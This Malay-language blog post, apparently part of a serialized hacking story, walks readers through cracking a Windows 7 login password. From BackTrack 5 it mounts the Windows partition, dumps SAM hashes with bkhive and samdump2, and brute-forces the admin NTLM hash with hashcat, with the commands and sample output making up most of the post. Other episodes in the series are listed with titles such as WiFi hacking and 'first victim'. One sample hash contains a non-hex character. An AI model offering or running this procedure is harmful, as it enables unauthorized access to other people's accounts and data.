Hackim Si Penggodam - Episod 10 (Hack Windows 7 Password)

Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

EPISOD KESEPULUH

Dalam menjalankan misinya itu. Hackim juga mempertingkatkan pengetahuannya dalam dunia hacking ini. Pada satu malam, semasa dia sedang cari tutorial hacking, dia ada terjumpa satu tutorial iaitu How To Hack Windows 7 Password. Melihat kepada tajuknya sahaja sudah menarik perhatian dia. Jadi dia pun cubalah mempraktikkan tutorial tersebut terhadap komputernya. Dan apa yang diperlukan hanyalah BackTrack 5. Di bawah ini adalah tutorialnya :



Pertama sekali buka BackTrack 5 anda. Kemudian buka terminal dan taipkan :

root@bt:~# fdisk -l


Kemudian taipkan perintah ini pula :

root@bt:~# mkdir /mnt/win
root@bt:~# mount /dev/sda2 /mnt/win


Mengikut kepada laptop saya, /dev/sda2 adalah partition yang mempunyai fail Windows. Atau dengan kata lainnya Local Disk C. Jadi anda punya mungkin /dev/sda1 atau pun lain. Anda kena pandai cari sendiri la.

Dah siap pilih? Okay kita akan change direction ke fail config dan kita list kesemua fail yang terdapat dalamnya.

root@bt:~# cd /mnt/win/Windows/System32/config
root@bt:/mnt/win/Windows/System32/config# ls


Setelah list kesemua fail, cuba cari fail SYSTEM. Jika ada, kita terus pula ke perintah ini.

root@bt:/mnt/win/Windows/System32/config# bkhive SYSTEM ~/Desktop/key


Apa itu bkhive? Anda boleh rujuk di sini.

Kemudian taipkan pula perintah ini :

root@bt:/mnt/win/Windows/System32/config# samdump2 SAM ~/Desktop/key > ~/Desktop/hash


Apa itu samdump2? Anda boleh rujuk di sini.

Dah siap semua tu, taipkan perintah ini untuk melihat isi dalam fail "hash" tersebut. Lihat contoh di bawah :

root@bt:/mnt/win/Windows/System32/config# cat ~/Desktop/hash
Administrator:500:aad3d425b53404eeaad3b435b51404ee:
32d6cfe0d46ae931b63c54d7a0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:
31d6cfe0a16ae931b73c59d7e0s089c0:::
AdminPass:1000:aad3b435b51404eeaad3b435b51404ee:
41e3de21585311b3e34410f3a27a7e5d:::


Mengikut kepada apa yang anda lihat di atas, "AdminPass" adalah admin yang mengandungi password yang kita cari. Jadi hari ni kita gunakan "hashcat" untuk pecahkan password AdminPass.

Jadi anda kena pergi ke direktori yang ada hashcat dengan taipkan perintah ini :

root@bt:/mnt/win/Windows/System32/config# cd /pentest/passwords/hashcat


Kemudian kita ambil bahagian "AdminPass:1000:aad3b435b51404eeaad3b435b51404ee:41e3de21585311b3e34410f3a27a7e5d:::" dari fail hash dan alihkan ke fail baru iaitu singlehash dengan menaipkan perintah ini :

root@bt:/pentest/passwords/hashcat# grep AdminPass ~/Desktop/hash > ~/Desktop/singlehash


Kita ke langkah seterusnya pula iaitu edit sedikit dalam fail singlehash itu. Anda hanya perlu taipkan perintah ini dulu :

root@bt:/pentest/passwords/hashcat# vi ~/Desktop/singlehash


Kemudian tekan huruf A pada keyboard anda untuk edit. Anda padamkan semua karakter yang berwarna kuning itu. Dan ianya akan jadi seperti gambar di bawah.

AdminPass:1000:aad3b435b51404eeaad3b435b51404ee:
41e3de21585311b3e34410f3a27a7e5d:::


Jadi seperti ini :

41e3de21585311b3e34410f3a27a7e5d


Okay dah siap? Kemudian tekan Ctrl+C dan taipkan karakter ini ":wq" tanpa quote dan tekan Enter. Seterusnya taipkan pula perintah ini :

root@bt:/pentest/passwords/hashcat# ./hashcat-cli32.bin --attack-mode=3 --hash-mode=1000 ~/Desktop/singlehash


Taipkan YES selepas itu dan siap! Anda hanya perlu tunggu sahaja sehingga password itu dipecahkan. Jika tidak berjaya, anda boleh edit hashcat supaya boleh berjaya. =)

Itulah tutorial yang telah dipelajari oleh Hackim. Dan dia telah berjaya pecahkan password komputernya yang menggunakan Windows 7. Ilmunya mengenai hacking sudah bertambah sedikit.

"Yeah! Aku berjaya pecahkan password ini. Aku nak mendalami lagilah pasal BackTrack ni. Banyak benda aku boleh buat."


Itulah antara ilmu hacking yang dipelajari oleh Hackim. Walaupun nampak sukar bagi pemula, andai ada kemahuan, pasti akan ada jalan penyelesaian. Tunggu untuk episod seterusnya!

p/s : Sila baca entri ini untuk menambahkan ilmu atau refresh balik ilmu anda itu. ^^

Hack Windows Administrator Password : PC Login Now
Tools Untuk Hack Windows Administrator Password
Ophcrack Live CD : Hack Windows Administrator Password

Hackim Si Penggodam :
Hackim Si Penggodam - Episod 1 (Introduction)
Hackim Si Penggodam - Episod 2 (Hacking Wifi WEP/WPA)
Hackim Si Penggodam - Episod 3 (Tujuan Yang Jelas)
Hackim Si Penggodam - Episod 4 (Social Engineering)
Hackim Si Penggodam - Episod 5 (Kuala Lumpur)
Hackim Si Penggodam - Episod 6 (Operating System For PenTest)
Hackim Si Penggodam - Episod 7 (Tip-Tip Social Engineering)
Hackim Si Penggodam - Episod 8 (Second Mission Started)
Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama)

Sekian.
Powered by Blogger.